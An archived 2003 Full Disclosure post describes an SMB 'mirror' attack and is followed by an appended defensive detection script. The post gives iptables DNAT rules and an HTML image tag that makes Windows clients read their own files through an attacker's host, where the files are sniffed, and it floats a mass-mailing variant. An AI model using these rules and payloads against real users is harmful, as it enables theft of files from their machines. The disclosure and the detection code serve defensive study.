Full Disclosure mailing list archives

"Mirror" attacks on windows clients


From: Joao Gouveia <tharbad () kaotik org>
Date: Fri, 10 Oct 2003 13:33:51 +0100

Hi all,

Last night I was debugging a netbios connection between two machines and
I remembered something real simple and "stupid".
I can't recall reading anything on the subject but fact is I didn't
do any kind of research, so sorry if this is a known issue.

Mirroring Netbios connections from windows clients.

Lacking a better term, I'm calling this "mirror" because the idea is to
put a windows client talking Netbios with himself.

I've prepared a simple iptables based firewall on a linux box, so that
being 10.10.10.1 the firewall external interface and 10.10.10.2 the
windows client, these simple rules apply (may wrap):

-A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport
139 -j DNAT --to-destination 10.10.10.2:139
-A POSTROUTING -o eth0 -j MASQUERADE

Basically, what this does (obviously) is "mirror" the connections to
port 139 of the firewall from the windows client to that same port on
the windows client, causing it in fact to be talking Netbios with
himself.

The Netbios connection is established and authenticated successfully,
which allows me to sniff on the (unencrypted) traffic on the linux box.

So, if the user on the windows workstation visits a web page on my linux
box that has (for example) <IMG SRC="file://10.10.10.1/c$/boot.ini"> he
will in fact be reading his own "boot.ini", and will be able to read it
also by dumping the port 139 traffic on my firewall.

Now, this sounds really simple and "stupid", and of course there's a
strong possibility that I'm looking at this from a totally wrong
perspective, if so I am sorry, but doesn't this look like it allows me
to send an HTML mail to 10000 windows/outlook users and use this to read
arbitrary files on their workstations (either by looking at the
traffic, or coding a simple program that parses the netbios traffic)?


Best regards,

Joao Gouveia
------------
tharbad () kaotik org
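Editor's added example (not part of the post above, and not the poster's code): the "mirror" leaves a distinctive footprint on the victim workstation, because the client both opens an SMB session to the reflector and, moments later, accepts an SMB session that appears to come from that same reflector. The script below runs two defensive checks over host-side connection records: it pairs an outbound tcp/139 or tcp/445 session to a peer with an inbound SMB session from that peer inside a short window (the reflection signature), and it lists outbound SMB to anything outside the site LAN (the leg a perimeter egress rule dropping tcp/139,445 to non-LAN destinations would stop, which is what defeats the mass-mailed variant). Assumptions: the log format is constructed for this example, the LAN is 10.10.10.0/24 as in the post, and the sample lines are made up.

```python
"""Host-side detection of the SMB 'mirror' pattern (added example).

Assumed (constructed) record format, one TCP connection per line:
    <epoch> <host> <in|out> <peer_ip>:<peer_port> local=<local_port>
'out' means the host initiated the connection, 'in' that it accepted one.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

SMB_PORTS = {139, 445}
# Networks SMB may legitimately reach (assumption: the site LAN from the post).
TRUSTED_NETS = [ip_network("10.10.10.0/24")]


@dataclass(frozen=True)
class Conn:
    ts: float
    host: str        # workstation that produced the record
    direction: str   # "out" or "in"
    peer: str
    peer_port: int
    local_port: int


def parse_line(line: str) -> Conn:
    """Parse one record in the constructed format above."""
    ts, host, direction, peer, local = line.split()
    peer_ip, peer_port = peer.rsplit(":", 1)
    return Conn(float(ts), host, direction, peer_ip, int(peer_port),
                int(local.split("=", 1)[1]))


def find_mirrors(conns, window=5.0):
    """Return (host, peer, ts) for every host that opened an SMB session to
    `peer` and within `window` seconds accepted an SMB session from that same
    peer: its own outbound leg is being NATed straight back at it."""
    outbound = defaultdict(list)            # (host, peer) -> [start times]
    for c in conns:
        if c.direction == "out" and c.peer_port in SMB_PORTS:
            outbound[(c.host, c.peer)].append(c.ts)
    hits = []
    for c in conns:
        if c.direction != "in" or c.local_port not in SMB_PORTS:
            continue
        for t in outbound.get((c.host, c.peer), []):
            if 0 <= c.ts - t <= window:
                hits.append((c.host, c.peer, t))
                break
    return hits


def egress_violations(conns):
    """Outbound SMB sessions to destinations outside TRUSTED_NETS, i.e. the
    traffic a perimeter rule blocking tcp/139,445 to non-LAN hosts would drop."""
    return [c for c in conns
            if c.direction == "out" and c.peer_port in SMB_PORTS
            and not any(ip_address(c.peer) in net for net in TRUSTED_NETS)]


def analyse(text):
    """Parse a block of records and run both checks."""
    conns = [parse_line(l) for l in text.splitlines() if l.strip()]
    return find_mirrors(conns), egress_violations(conns)


# Constructed sample: line 1/2 are the mirror (10.10.10.2 talks to "10.10.10.1"
# and is immediately connected to on 139 by "10.10.10.1"); line 3/4 are a
# normal LAN file-share session; line 5 is SMB leaving the LAN entirely.
SAMPLE_LOG = """\
1065789231.1 10.10.10.2 out 10.10.10.1:139 local=1041
1065789231.2 10.10.10.2 in 10.10.10.1:1041 local=139
1065789240.0 10.10.10.2 out 10.10.10.5:445 local=1042
1065789260.0 10.10.10.5 in 10.10.10.2:1042 local=445
1065789300.0 10.10.10.2 out 203.0.113.7:445 local=1043
"""

if __name__ == "__main__":
    mirrors, leaks = analyse(SAMPLE_LOG)
    for host, peer, ts in mirrors:
        print(f"MIRROR: {host} reflected through {peer} at {ts}")
    for c in leaks:
        print(f"EGRESS: {c.host} -> {c.peer}:{c.peer_port} leaves the LAN")
```

Note that the in-LAN reflector from the post is only caught by the mirror check (10.10.10.1 is inside the trusted net), while the mass-mail scenario in the last paragraph is the one the egress check addresses; both are worth running.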
